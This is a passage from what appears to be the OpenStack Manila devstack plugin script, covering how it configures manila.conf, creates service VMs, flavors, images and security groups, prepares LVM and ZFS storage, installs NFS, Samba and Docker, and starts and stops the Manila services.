iniset $MANILA_CONF DEFAULT osapi_share_extension manila.api.contrib.standard_extensions
iniset $MANILA_CONF DEFAULT state_path $MANILA_STATE_PATH
# Note: Sample share types will still be created if the below is False
if [ $(trueorfalse False MANILA_CONFIGURE_DEFAULT_TYPES) == True ]; then
iniset $MANILA_CONF DEFAULT default_share_type $MANILA_DEFAULT_SHARE_TYPE
iniset $MANILA_CONF DEFAULT default_share_group_type $MANILA_DEFAULT_SHARE_GROUP_TYPE
fi
if ! [[ -z $MANILA_SHARE_MIGRATION_PERIOD_TASK_INTERVAL ]]; then
iniset $MANILA_CONF DEFAULT migration_driver_continue_update_interval $MANILA_SHARE_MIGRATION_PERIOD_TASK_INTERVAL
fi
if ! [[ -z $MANILA_DATA_COPY_CHECK_HASH ]]; then
iniset $MANILA_CONF DEFAULT check_hash $MANILA_DATA_COPY_CHECK_HASH
fi
iniset $MANILA_CONF DEFAULT enabled_share_protocols $MANILA_ENABLED_SHARE_PROTOCOLS
iniset $MANILA_CONF oslo_concurrency lock_path $MANILA_LOCK_PATH
iniset $MANILA_CONF DEFAULT wsgi_keep_alive False
iniset $MANILA_CONF DEFAULT lvm_share_volume_group $SHARE_GROUP
# Set the replica_state_update_interval
iniset $MANILA_CONF DEFAULT replica_state_update_interval $MANILA_REPLICA_STATE_UPDATE_INTERVAL
# Set the use_scheduler_creating_share_from_snapshot
iniset $MANILA_CONF DEFAULT use_scheduler_creating_share_from_snapshot $MANILA_USE_SCHEDULER_CREATING_SHARE_FROM_SNAPSHOT
# Configure keystone credentials for each service manila talks to.
if is_service_enabled neutron; then
configure_keystone_authtoken_middleware $MANILA_CONF neutron neutron
fi
if is_service_enabled nova; then
configure_keystone_authtoken_middleware $MANILA_CONF nova nova
fi
if is_service_enabled cinder; then
configure_keystone_authtoken_middleware $MANILA_CONF cinder cinder
fi
# Note: set up config group does not mean that this backend will be enabled.
# To enable it, specify its name explicitly using "enabled_share_backends" opt.
configure_default_backends
default_backends=$MANILA_BACKEND1_CONFIG_GROUP_NAME
if [ "$MANILA_MULTI_BACKEND" = "True" ]; then
default_backends+=,$MANILA_BACKEND2_CONFIG_GROUP_NAME
fi
if [ ! $MANILA_ENABLED_BACKENDS ]; then
# If $MANILA_ENABLED_BACKENDS is not set, use configured backends by default
export MANILA_ENABLED_BACKENDS=$default_backends
fi
iniset $MANILA_CONF DEFAULT enabled_share_backends $MANILA_ENABLED_BACKENDS
# Generate the service SSH keypair used by the generic driver if missing.
if [ ! -f $MANILA_PATH_TO_PRIVATE_KEY ]; then
ssh-keygen -N "" -t rsa -f $MANILA_PATH_TO_PRIVATE_KEY;
fi
iniset $MANILA_CONF DEFAULT manila_service_keypair_name $MANILA_SERVICE_KEYPAIR_NAME
REAL_MANILA_SERVICE_PORT=$MANILA_SERVICE_PORT
if is_service_enabled tls-proxy; then
# Set the protocol to 'https', update the endpoint base and set the default port
MANILA_SERVICE_PROTOCOL="https"
MANILA_ENDPOINT_BASE="${MANILA_ENDPOINT_BASE/http:/https:}"
REAL_MANILA_SERVICE_PORT=$MANILA_SERVICE_PORT_INT
# Set the service port for a proxy to take the original
iniset $MANILA_CONF DEFAULT osapi_share_listen_port $REAL_MANILA_SERVICE_PORT
iniset $MANILA_CONF oslo_middleware enable_proxy_headers_parsing True
fi
iniset_rpc_backend manila $MANILA_CONF DEFAULT
setup_logging $MANILA_CONF
# Apply per-group and DEFAULT overrides from MANILA_OPTGROUP_* env vars,
# then assign availability zones and write the chosen WSGI frontend config.
MANILA_CONFIGURE_GROUPS=${MANILA_CONFIGURE_GROUPS:-"$MANILA_ENABLED_BACKENDS"}
set_config_opts $MANILA_CONFIGURE_GROUPS
set_config_opts DEFAULT
set_backend_availability_zones $MANILA_ENABLED_BACKENDS
if [ $(trueorfalse False MANILA_USE_UWSGI) == True ]; then
write_uwsgi_config "$MANILA_UWSGI_CONF" "$MANILA_WSGI" "/share"
fi
if [ $(trueorfalse False MANILA_USE_MOD_WSGI) == True ]; then
_config_manila_apache_wsgi
fi
}
function create_manila_service_keypair {
if is_service_enabled nova; then
local keypair_exists=$( openstack keypair list | grep " $MANILA_SERVICE_KEYPAIR_NAME " )
if [[ -z $keypair_exists ]]; then
openstack keypair create $MANILA_SERVICE_KEYPAIR_NAME --public-key $MANILA_PATH_TO_PUBLIC_KEY
fi
fi
}
function is_driver_enabled {
driver_name=$1
for BE in ${MANILA_ENABLED_BACKENDS//,/ }; do
share_driver=$(iniget $MANILA_CONF $BE share_driver)
if [ "$share_driver" == "$driver_name" ]; then
return 0
fi
done
return 1
}
# create_service_share_servers - creates service Nova VMs, one per generic
# driver, and only if it is configured to mode without handling of share servers.
function create_service_share_servers {
created_admin_network=false
for BE in ${MANILA_ENABLED_BACKENDS//,/ }; do
driver_handles_share_servers=$(iniget $MANILA_CONF $BE driver_handles_share_servers)
share_driver=$(iniget $MANILA_CONF $BE share_driver)
generic_driver='manila.share.drivers.generic.GenericShareDriver'
if [[ $share_driver == $generic_driver ]]; then
if [[ $(trueorfalse False driver_handles_share_servers) == False ]]; then
vm_name='manila_service_share_server_'$BE
local vm_exists=$( openstack server list --all-projects | grep " $vm_name " )
if [[ -z $vm_exists ]]; then
private_net_id=$(openstack network show $PRIVATE_NETWORK_NAME -f value -c id)
vm_id=$(openstack server create $vm_name \
--flavor $MANILA_SERVICE_VM_FLAVOR_NAME \
--image $MANILA_SERVICE_IMAGE_NAME \
--nic net-id=$private_net_id \
--security-group $MANILA_SERVICE_SECGROUP \
--key-name $MANILA_SERVICE_KEYPAIR_NAME \
| grep ' id ' | get_field 2)
else
vm_id=$(openstack server show $vm_name -f value -c id)
fi
floating_ip=$(openstack floating ip create $PUBLIC_NETWORK_NAME --subnet $PUBLIC_SUBNET_NAME | grep 'floating_ip_address' | get_field 2)
# TODO(rishabh-d-dave): For time being circumvent the bug -
# https://bugs.launchpad.net/python-openstackclient/+bug/1747721
# Once fixed, replace the following 3 lines by -
# openstack server add floating ip $vm_id $floating_ip
vm_port_id=$(openstack port list --server $vm_id -c ID -f \
value)
openstack floating ip set --port $vm_port_id $floating_ip
iniset $MANILA_CONF $BE service_instance_name_or_id $vm_id
iniset $MANILA_CONF $BE service_net_name_or_ip $floating_ip
iniset $MANILA_CONF $BE tenant_net_name_or_ip $PRIVATE_NETWORK_NAME
else
if is_service_enabled neutron; then
if ! [[ -z $MANILA_ADMIN_NET_RANGE ]]; then
if [ $created_admin_network == false ]; then
project_id=$(openstack project show $SERVICE_PROJECT_NAME -c id -f value)
local admin_net_id=$( openstack network show admin_net -f value -c id )
if [[ -z $admin_net_id ]]; then
openstack network create admin_net --project $project_id
admin_net_id=$(openstack network show admin_net -f value -c id)
fi
local admin_subnet_id=$( openstack subnet show admin_subnet -f value -c id )
if [[ -z $admin_subnet_id ]]; then
openstack subnet create admin_subnet --project $project_id --ip-version 4 --network $admin_net_id --gateway None --subnet-range $MANILA_ADMIN_NET_RANGE
admin_subnet_id=$(openstack subnet show admin_subnet -f value -c id)
fi
created_admin_network=true
fi
iniset $MANILA_CONF $BE admin_network_id $admin_net_id
iniset $MANILA_CONF $BE admin_subnet_id $admin_subnet_id
fi
fi
fi
fi
done
configure_data_service_generic_driver
}
function configure_data_service_generic_driver {
enabled_backends=(${MANILA_ENABLED_BACKENDS//,/ })
share_driver=$(iniget $MANILA_CONF ${enabled_backends[0]} share_driver)
generic_driver='manila.share.drivers.generic.GenericShareDriver'
if [[ $share_driver == $generic_driver ]]; then
driver_handles_share_servers=$(iniget $MANILA_CONF ${enabled_backends[0]} driver_handles_share_servers)
if [[ $(trueorfalse False driver_handles_share_servers) == False ]]; then
iniset $MANILA_CONF DEFAULT data_node_access_ips $PUBLIC_NETWORK_GATEWAY
else
if ! [[ -z $MANILA_DATA_NODE_IP ]]; then
iniset $MANILA_CONF DEFAULT data_node_access_ips $MANILA_DATA_NODE_IP
fi
fi
fi
}
# create_manila_service_flavor - creates flavor, that will be used by backends
# with configured generic driver to boot Nova VMs with.
function create_manila_service_flavor {
    if is_service_enabled nova; then
        # grep with surrounding spaces to avoid partial-name matches;
        # only create the flavor when it does not exist yet (idempotent).
        local flavor_exists=$( openstack flavor list | grep " $MANILA_SERVICE_VM_FLAVOR_NAME " )
        if [[ -z $flavor_exists ]]; then
            # Create flavor for Manila's service VM
            openstack flavor create \
                $MANILA_SERVICE_VM_FLAVOR_NAME \
                --id $MANILA_SERVICE_VM_FLAVOR_REF \
                --ram $MANILA_SERVICE_VM_FLAVOR_RAM \
                --disk $MANILA_SERVICE_VM_FLAVOR_DISK \
                --vcpus $MANILA_SERVICE_VM_FLAVOR_VCPUS
        fi
    fi
}
# create_manila_service_image - creates image, that will be used by backends
# with configured generic driver to boot Nova VMs from.
function create_manila_service_image {
    if is_service_enabled nova; then
        TOKEN=$(openstack token issue -c id -f value)
        # Skip the (potentially slow) download when the image already exists
        local image_exists=$( openstack image list | grep " $MANILA_SERVICE_IMAGE_NAME " )
        if [[ -z $image_exists ]]; then
            # Download Manila's image; requires the glance registry service
            if is_service_enabled g-reg; then
                upload_image $MANILA_SERVICE_IMAGE_URL $TOKEN
            fi
        fi
    fi
}
# create_manila_service_secgroup - creates security group that is used by
# Nova VMs when generic driver is configured.
function create_manila_service_secgroup {
    # Create a secgroup (only when absent, so reruns are idempotent)
    if ! openstack security group list | grep -q $MANILA_SERVICE_SECGROUP; then
        openstack security group create $MANILA_SERVICE_SECGROUP --description "$MANILA_SERVICE_SECGROUP description"
        # Group creation is asynchronous; poll for up to 30 seconds
        if ! timeout 30 sh -c "while ! openstack security group list | grep -q $MANILA_SERVICE_SECGROUP; do sleep 1; done"; then
            echo "Security group not created"
            exit 1
        fi
    fi

    # Configure Security Group Rules. Each rule is guarded by a grep so
    # reruns do not create duplicates. Ports opened: ICMP (ping),
    # 22/tcp (SSH), 2049 tcp+udp (NFS), 445 tcp+udp and 137-139 tcp+udp
    # (CIFS/SMB and NetBIOS).
    if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q icmp; then
        openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol icmp
    fi
    if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " tcp .* 22 "; then
        openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol tcp --dst-port 22
    fi
    if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " tcp .* 2049 "; then
        openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol tcp --dst-port 2049
    fi
    if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " udp .* 2049 "; then
        openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol udp --dst-port 2049
    fi
    if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " udp .* 445 "; then
        openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol udp --dst-port 445
    fi
    if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " tcp .* 445 "; then
        openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol tcp --dst-port 445
    fi
    # NOTE: the guard greps for port 139 but the rule opens the 137:139 range
    if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " tcp .* 139 "; then
        openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol tcp --dst-port 137:139
    fi
    if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " udp .* 139 "; then
        openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol udp --dst-port 137:139
    fi

    # List secgroup rules
    openstack security group rule list $MANILA_SERVICE_SECGROUP
}
# create_manila_accounts - Set up common required manila accounts
function create_manila_accounts {
    # Both API versions share one service user but register separate
    # service entries and endpoints in the catalog.
    local endpoint_v1="$MANILA_ENDPOINT_BASE/v1/\$(project_id)s"
    local endpoint_v2="$MANILA_ENDPOINT_BASE/v2/\$(project_id)s"

    create_service_user "manila"

    # Legacy v1 share service
    get_or_create_service "manila" "share" "Manila Shared Filesystem Service"
    get_or_create_endpoint "share" "$REGION_NAME" "$endpoint_v1"

    # Set up Manila v2 service and endpoint
    get_or_create_service "manilav2" "sharev2" "Manila Shared Filesystem Service V2"
    get_or_create_endpoint "sharev2" "$REGION_NAME" "$endpoint_v2"
}
# create_default_share_group_type - create share group type that will be set as default.
function create_default_share_group_type {
    # Create the group type only once, backed by the default share type
    local type_exists=$( manila share-group-type-list | grep " $MANILA_DEFAULT_SHARE_GROUP_TYPE " )
    if [[ -z $type_exists ]]; then
        manila share-group-type-create $MANILA_DEFAULT_SHARE_GROUP_TYPE $MANILA_DEFAULT_SHARE_TYPE
    fi
    # Attach group specs when the deployer configured any
    if [[ $MANILA_DEFAULT_SHARE_GROUP_TYPE_SPECS ]]; then
        manila share-group-type-key $MANILA_DEFAULT_SHARE_GROUP_TYPE set $MANILA_DEFAULT_SHARE_GROUP_TYPE_SPECS
    fi
}
# create_default_share_type - create share type that will be set as default
# if $MANILA_CONFIGURE_DEFAULT_TYPES is set to True, if set to False, the share
# type identified by $MANILA_DEFAULT_SHARE_TYPE is still created, but not
# configured as default.
function create_default_share_type {
    enabled_backends=(${MANILA_ENABLED_BACKENDS//,/ })
    # The DHSS mode of the first enabled backend becomes the type's
    # driver_handles_share_servers value.
    driver_handles_share_servers=$(iniget $MANILA_CONF ${enabled_backends[0]} driver_handles_share_servers)

    local type_exists=$( manila type-list | grep " $MANILA_DEFAULT_SHARE_TYPE " )
    if [[ -z $type_exists ]]; then
        local command_args="$MANILA_DEFAULT_SHARE_TYPE $driver_handles_share_servers"
        #if is_driver_enabled $MANILA_CONTAINER_DRIVER; then
        #    # TODO(aovchinnikov): Remove this condition when Container driver supports
        #    # snapshots
        #    command_args="$command_args --snapshot_support false"
        #fi
        manila type-create $command_args
    fi
    # Attach extra specs when the deployer configured any
    if [[ $MANILA_DEFAULT_SHARE_TYPE_EXTRA_SPECS ]]; then
        manila type-key $MANILA_DEFAULT_SHARE_TYPE set $MANILA_DEFAULT_SHARE_TYPE_EXTRA_SPECS
    fi
}
# create_custom_share_types - create share types suitable for both possible
# driver modes with names "dhss_true" and "dhss_false".
function create_custom_share_types {
    # One share type per DHSS mode so tests can explicitly pick either.
    local extra_specs

    manila type-create dhss_true True
    extra_specs=$MANILA_DHSS_TRUE_SHARE_TYPE_EXTRA_SPECS
    if [[ -n $extra_specs ]]; then
        manila type-key dhss_true set $extra_specs
    fi

    manila type-create dhss_false False
    extra_specs=$MANILA_DHSS_FALSE_SHARE_TYPE_EXTRA_SPECS
    if [[ -n $extra_specs ]]; then
        manila type-key dhss_false set $extra_specs
    fi
}
# configure_backing_file - Set up backing file for LVM
function configure_backing_file {
    # Refresh LVM's view of volume groups before checking for $SHARE_GROUP
    sudo vgscan
    if ! sudo vgs $SHARE_GROUP; then
        if [ "$CONFIGURE_BACKING_FILE" = "True" ]; then
            SHARE_BACKING_FILE=${SHARE_BACKING_FILE:-$DATA_DIR/${SHARE_GROUP}-backing-file}
            # Only create if the file doesn't already exist
            [[ -f $SHARE_BACKING_FILE ]] || truncate -s $SHARE_BACKING_FILE_SIZE $SHARE_BACKING_FILE
            # Attach the file to the first free loop device
            DEV=`sudo losetup -f --show $SHARE_BACKING_FILE`
        else
            # Use the preconfigured block device directly
            DEV=$SHARE_BACKING_FILE
        fi

        # Only create if the loopback device doesn't contain $SHARE_GROUP
        if ! sudo vgs $SHARE_GROUP; then sudo vgcreate $SHARE_GROUP $DEV; fi
    fi

    mkdir -p $MANILA_STATE_PATH/shares
    mkdir -p /tmp/shares
}
# init_manila - Initializes database and creates manila dir if absent
function init_manila {

    if is_service_enabled $DATABASE_BACKENDS; then
        # (re)create manila database
        recreate_database manila
        $MANILA_BIN_DIR/manila-manage db sync

        if [[ $(trueorfalse False MANILA_USE_DOWNGRADE_MIGRATIONS) == True ]]; then
            # Use both - upgrade and downgrade migrations to verify that
            # downgrade migrations do not break structure of Manila database.
            $MANILA_BIN_DIR/manila-manage db downgrade
            $MANILA_BIN_DIR/manila-manage db sync
        fi

        # Display version as debug-action (see bug/1473400)
        $MANILA_BIN_DIR/manila-manage db version
    fi

    # Driver-specific storage preparation: LVM and Container drivers use a
    # file-backed volume group; ZFSonLinux builds file-backed zpools.
    if [ "$SHARE_DRIVER" == "manila.share.drivers.lvm.LVMShareDriver" ]; then
        if is_service_enabled m-shr; then
            # Configure a default volume group called '`lvm-shares`' for the share
            # service if it does not yet exist. If you don't wish to use a file backed
            # volume group, create your own volume group called ``stack-volumes`` before
            # invoking ``stack.sh``.
            #
            # By default, the backing file is 8G in size, and is stored in ``/opt/stack/data``.
            configure_backing_file
        fi
    elif [ "$SHARE_DRIVER" == $MANILA_CONTAINER_DRIVER ]; then
        if is_service_enabled m-shr; then
            SHARE_GROUP=$MANILA_CONTAINER_VOLUME_GROUP_NAME
            configure_backing_file
        fi
    elif [ "$SHARE_DRIVER" == "manila.share.drivers.zfsonlinux.driver.ZFSonLinuxShareDriver" ]; then
        if is_service_enabled m-shr; then
            mkdir -p $MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR
            file_counter=0
            MANILA_ZFSONLINUX_SERVICE_IP=${MANILA_ZFSONLINUX_SERVICE_IP:-"127.0.0.1"}
            # Create one or more file-backed zpools per enabled backend
            for BE in ${MANILA_ENABLED_BACKENDS//,/ }; do
                if [[ $file_counter == 0 ]]; then
                    # NOTE(vponomaryov): create two pools for first ZFS backend
                    # to cover different use cases that are supported by driver:
                    # - Support of more than one zpool for share backend.
                    # - Support of nested datasets.
                    local first_file="$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR"/alpha
                    local second_file="$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR"/betta
                    truncate -s $MANILA_ZFSONLINUX_ZPOOL_SIZE $first_file
                    truncate -s $MANILA_ZFSONLINUX_ZPOOL_SIZE $second_file
                    sudo zpool create alpha $first_file
                    sudo zpool create betta $second_file
                    # Create subdir (nested dataset) for second pool
                    sudo zfs create betta/subdir
                    iniset $MANILA_CONF $BE zfs_zpool_list alpha,betta/subdir
                elif [[ $file_counter == 1 ]]; then
                    local file="$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR"/gamma
                    truncate -s $MANILA_ZFSONLINUX_ZPOOL_SIZE $file
                    sudo zpool create gamma $file
                    iniset $MANILA_CONF $BE zfs_zpool_list gamma
                else
                    # Third and later backends get generically named pools
                    local filename=file"$file_counter"
                    local file="$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR"/"$filename"
                    truncate -s $MANILA_ZFSONLINUX_ZPOOL_SIZE $file
                    sudo zpool create $filename $file
                    iniset $MANILA_CONF $BE zfs_zpool_list $filename
                fi
                # Common ZFS backend options; DHSS is always False for this driver
                iniset $MANILA_CONF $BE zfs_share_export_ip $MANILA_ZFSONLINUX_SHARE_EXPORT_IP
                iniset $MANILA_CONF $BE zfs_service_ip $MANILA_ZFSONLINUX_SERVICE_IP
                iniset $MANILA_CONF $BE zfs_dataset_creation_options $MANILA_ZFSONLINUX_DATASET_CREATION_OPTIONS
                iniset $MANILA_CONF $BE zfs_use_ssh $MANILA_ZFSONLINUX_USE_SSH
                iniset $MANILA_CONF $BE zfs_ssh_username $MANILA_ZFSONLINUX_SSH_USERNAME
                iniset $MANILA_CONF $BE replication_domain $MANILA_ZFSONLINUX_REPLICATION_DOMAIN
                iniset $MANILA_CONF $BE driver_handles_share_servers False
                let "file_counter=file_counter+1"
            done
            # Install the server's SSH key in our known_hosts file
            eval STACK_HOME=~$STACK_USER
            ssh-keyscan ${MANILA_ZFSONLINUX_SERVICE_IP} >> $STACK_HOME/.ssh/known_hosts
            # If the server is this machine, setup trust for ourselves (otherwise you're on your own)
            if [ "$MANILA_ZFSONLINUX_SERVICE_IP" = "127.0.0.1" ] || [ "$MANILA_ZFSONLINUX_SERVICE_IP" = "localhost" ] ; then
                # Trust our own SSH keys
                eval SSH_USER_HOME=~$MANILA_ZFSONLINUX_SSH_USERNAME
                cat $STACK_HOME/.ssh/*.pub >> $SSH_USER_HOME/.ssh/authorized_keys
                # Give ssh user sudo access
                echo "$MANILA_ZFSONLINUX_SSH_USERNAME ALL=(ALL) NOPASSWD: ALL" | sudo tee -a /etc/sudoers > /dev/null
                iniset $MANILA_CONF DEFAULT data_node_access_ips $MANILA_ZFSONLINUX_SERVICE_IP
            fi
        fi
    fi
}
# check_nfs_kernel_service_state_ubuntu - Make sure nfsd is running
function check_nfs_kernel_service_state_ubuntu {
    # (aovchinnikov): Workaround for nfs-utils bug 1052264
    # NOTE(review): this appears to work around nfsd refusing to start with
    # an empty /etc/exports by exporting a dummy read-only path — confirm.
    if [[ $(sudo service nfs-kernel-server status &> /dev/null || echo 'fail') == 'fail' ]]; then
        echo "Apparently nfsd is not running. Trying to fix that."
        sudo mkdir -p "/media/nfsdonubuntuhelper"
        # (aovchinnikov): shell wrapping is needed for cases when a file to be written
        # is owned by root.
        sudo sh -c "echo '/media/nfsdonubuntuhelper 127.0.0.1(ro)' >> /etc/exports"
        sudo service nfs-kernel-server start
    fi
    # Re-check; if the fix above did not help, abort the deployment
    if [[ $(sudo service nfs-kernel-server status &> /dev/null || echo 'fail') == 'fail' ]]; then
        echo "Failed to start nfsd. Exiting."
        exit 1
    fi
}
# _install_nfs_and_samba - install NFS and Samba server packages for the
# current distro and make sure the services are up where needed.
function _install_nfs_and_samba {
    if is_ubuntu; then
        install_package nfs-kernel-server nfs-common samba
        check_nfs_kernel_service_state_ubuntu
    elif is_fedora; then
        install_package nfs-utils samba
        # Fedora does not start these daemons automatically after install
        local unit
        for unit in smb.service nfs-server.service; do
            sudo systemctl enable $unit
            sudo systemctl start $unit
        done
    elif is_suse; then
        install_package nfs-kernel-server nfs-utils samba
    else
        echo "This distro is not supported. Skipping step of NFS and Samba installation."
    fi
}
# install_manilaclient - Collect source and prepare
# In order to install from git, add LIBS_FROM_GIT="python-manilaclient"
# to local.conf
function install_manilaclient {
    # Pip is the default; a git checkout is used only when the library is
    # listed in LIBS_FROM_GIT.
    if ! use_library_from_git "python-manilaclient"; then
        pip_install python-manilaclient
    else
        git_clone $MANILACLIENT_REPO $MANILACLIENT_DIR $MANILACLIENT_BRANCH
        setup_develop $MANILACLIENT_DIR
    fi
}
# install_manila - Collect source and prepare
# install_manila - install manila from source plus the NFS/Samba, ZFS or
# docker prerequisites required by the configured share driver.
function install_manila {
    setup_develop $MANILA_DIR

    if is_service_enabled m-shr; then

        # Skip NFS/Samba installation when nfs-ganesha is already serving,
        # and for CephFS (which handles its own export machinery).
        if [[ ! $(systemctl is-active nfs-ganesha.service) == 'active' ]] ; then
            if [ "$SHARE_DRIVER" != "manila.share.drivers.cephfs.driver.CephFSDriver" ] ; then
                _install_nfs_and_samba
            fi
        fi

        if [ "$SHARE_DRIVER" == "manila.share.drivers.zfsonlinux.driver.ZFSonLinuxShareDriver" ]; then
            # Detect ZFS by probing both the zfs and zpool commands
            if [[ $(sudo zfs list &> /dev/null && sudo zpool list &> /dev/null || echo 'absent') == 'absent' ]]; then
                # ZFS not found, try to install it
                if is_ubuntu; then
                    if [[ $(lsb_release -s -d) == *"14.04"* ]]; then
                        # Trusty: ZFS comes from a PPA
                        sudo apt-get install -y software-properties-common
                        sudo apt-add-repository --yes ppa:zfs-native/stable

                        # Workaround for bug #1609696
                        sudo apt-mark hold grub*

                        sudo apt-get -y -q update && sudo apt-get -y -q upgrade

                        # Workaround for bug #1609696
                        sudo apt-mark unhold grub*

                        sudo apt-get install -y linux-headers-generic
                        sudo apt-get install -y build-essential
                        sudo apt-get install -y ubuntu-zfs
                    elif [[ $(echo $(lsb_release -rs) '>=' 16.04 | bc -l) == 1 ]]; then
                        # Xenial and beyond: ZFS is in the main archive
                        sudo apt-get install -y zfsutils-linux
                    else
                        echo "Only 'Trusty', 'Xenial' and newer releases of Ubuntu are supported."
                        exit 1
                    fi
                else
                    echo "Manila Devstack plugin supports installation "\
"of ZFS packages only for 'Ubuntu' distros. "\
"Please, install it first by other means or add its support "\
"for your distro."
                    exit 1
                fi
                sudo modprobe zfs
                sudo modprobe zpool
            fi
            check_nfs_kernel_service_state_ubuntu
        elif [ "$SHARE_DRIVER" == $MANILA_CONTAINER_DRIVER ]; then
            if is_ubuntu; then
                echo "Installing docker...."
                install_docker_ubuntu
                echo "Importing docker image"
                import_docker_service_image_ubuntu
            elif is_fedora; then
                echo "Installing docker...."
                install_docker_fedora
                echo "Importing docker image"
                # TODO(tbarron): See if using a fedora container image
                # is faster/smaller because of fewer extra dependencies.
                import_docker_service_image_ubuntu
            else
                echo "Manila Devstack plugin does not support Container Driver on"\
" distros other than Ubuntu or Fedora."
                exit 1
            fi
        fi
    fi
}
#configure_samba - Configure node as Samba server
function configure_samba {
    # Samba is only needed by the LVM driver (CIFS exports from this host)
    if [ "$SHARE_DRIVER" == "manila.share.drivers.lvm.LVMShareDriver" ]; then
        # TODO(vponomaryov): add here condition for ZFSonLinux driver too
        # when it starts to support SAMBA
        samba_daemon_name=smbd
        if is_service_enabled m-shr; then
            if is_fedora; then
                # Fedora names the service 'smb' rather than 'smbd'
                samba_daemon_name=smb
            fi
            sudo service $samba_daemon_name restart || echo "Couldn't restart '$samba_daemon_name' service"
        fi

        # Start from the distro's sample config when available
        if [[ -e /usr/share/samba/smb.conf ]]; then
            sudo cp /usr/share/samba/smb.conf $SMB_CONF
        fi
        sudo chown $STACK_USER -R /etc/samba
        iniset $SMB_CONF global include registry
        iniset $SMB_CONF global security user
        if [ ! -d "$SMB_PRIVATE_DIR" ]; then
            sudo mkdir $SMB_PRIVATE_DIR
            sudo touch $SMB_PRIVATE_DIR/secrets.tdb
        fi

        # LVM driver runs with DHSS=False; exports use the configured IPs
        for backend_name in ${MANILA_ENABLED_BACKENDS//,/ }; do
            iniset $MANILA_CONF $backend_name driver_handles_share_servers False
            iniset $MANILA_CONF $backend_name lvm_share_export_ips $MANILA_LVM_SHARE_EXPORT_IPS
        done
        iniset $MANILA_CONF DEFAULT data_node_access_ips $HOST_IP
    fi
}
# start_manila_api - starts manila API services and checks its availability
function start_manila_api {

    # NOTE(vkmc) If both options are set to true we are using uwsgi
    # as the preferred way to deploy manila. See
    # https://governance.openstack.org/tc/goals/pike/deploy-api-in-wsgi.html#uwsgi-vs-mod-wsgi
    # for more details
    if [ $(trueorfalse False MANILA_USE_UWSGI) == True ] && [ $(trueorfalse False MANILA_USE_MOD_WSGI) == True ]; then
        MSG="Both MANILA_USE_UWSGI and MANILA_USE_MOD_WSGI are set to True.
Using UWSGI as the preferred option
Set MANILA_USE_UWSGI to False to deploy manila api with MOD_WSGI"
        warn $LINENO $MSG
    fi

    # Three deployment flavors: uwsgi, apache mod_wsgi, or the eventlet
    # built-in server (in that order of preference).
    if [ $(trueorfalse False MANILA_USE_UWSGI) == True ]; then
        echo "Deploying with UWSGI"
        run_process m-api "$MANILA_BIN_DIR/uwsgi --ini $MANILA_UWSGI_CONF --procname-prefix manila-api"
    elif [ $(trueorfalse False MANILA_USE_MOD_WSGI) == True ]; then
        echo "Deploying with MOD_WSGI"
        install_apache_wsgi
        enable_apache_site manila-api
        restart_apache_server
        tail_log m-api /var/log/$APACHE_NAME/manila_api.log
    else
        echo "Deploying with built-in server"
        run_process m-api "$MANILA_BIN_DIR/manila-api --config-file $MANILA_CONF"
    fi

    echo "Waiting for Manila API to start..."
    # This is a health check against the manila-api service we just started.
    # We use the port ($REAL_MANILA_SERVICE_PORT) here because we want to hit
    # the bare service endpoint, even if the tls tunnel should be enabled.
    # We're making sure that the internal port is checked using unencrypted
    # traffic at this point.
    local MANILA_HEALTH_CHECK_URL=$MANILA_SERVICE_PROTOCOL://$MANILA_SERVICE_HOST:$REAL_MANILA_SERVICE_PORT
    if [ $(trueorfalse False MANILA_USE_UWSGI) == True ]; then
        # Under uwsgi the API is only reachable via the configured endpoint
        MANILA_HEALTH_CHECK_URL=$MANILA_ENDPOINT_BASE
    fi
    if ! wait_for_service $SERVICE_TIMEOUT $MANILA_HEALTH_CHECK_URL; then
        die $LINENO "Manila API did not start"
    fi

    # Start proxies if enabled
    #
    # If tls-proxy is enabled and MANILA_USE_UWSGI is set to True, a generic
    # http-services-tls-proxy will be set up to handle tls-termination to
    # manila as well as all the other https services, we don't need to
    # create our own.
    if [ $(trueorfalse False MANILA_USE_UWSGI) == False ] && is_service_enabled tls-proxy; then
        start_tls_proxy manila '*' $MANILA_SERVICE_PORT $MANILA_SERVICE_HOST $MANILA_SERVICE_PORT_INT
    fi
}
# start_rest_of_manila - starts non-api manila services
function start_rest_of_manila {
    # Launch each worker service under its devstack process name.
    # Order matters only cosmetically; all read the same config file.
    local entry
    for entry in m-shr:manila-share m-sch:manila-scheduler m-dat:manila-data; do
        run_process ${entry%%:*} "$MANILA_BIN_DIR/${entry##*:} --config-file $MANILA_CONF"
    done
}
# start_manila - start all manila services. This function is kept for compatibility
# reasons with old approach.
function start_manila {
    # Start the API first: start_manila_api blocks until the API answers,
    # so the worker services come up against a live endpoint.
    start_manila_api
    start_rest_of_manila
}
# stop_manila - Stop running processes
function stop_manila {
    # The API runs either under apache (mod_wsgi) or as a devstack process;
    # tear it down accordingly.
    if [ $(trueorfalse False MANILA_USE_MOD_WSGI) == True ]; then
        disable_apache_site manila-api
        restart_apache_server
    else
        stop_process m-api
    fi

    # Scheduler, share and data services always run as plain processes
    stop_process m-sch
    stop_process m-shr
    stop_process m-dat
}
# Clone and install manila-tempest-plugin system-wide. Repo and branch can
# be overridden via MANILA_TEMPEST_PLUGIN_REPO / _BRANCH.
function install_manila_tempest_plugin {
    MANILA_TEMPEST_PLUGIN_REPO=${MANILA_TEMPEST_PLUGIN_REPO:-${GIT_BASE}/openstack/manila-tempest-plugin}
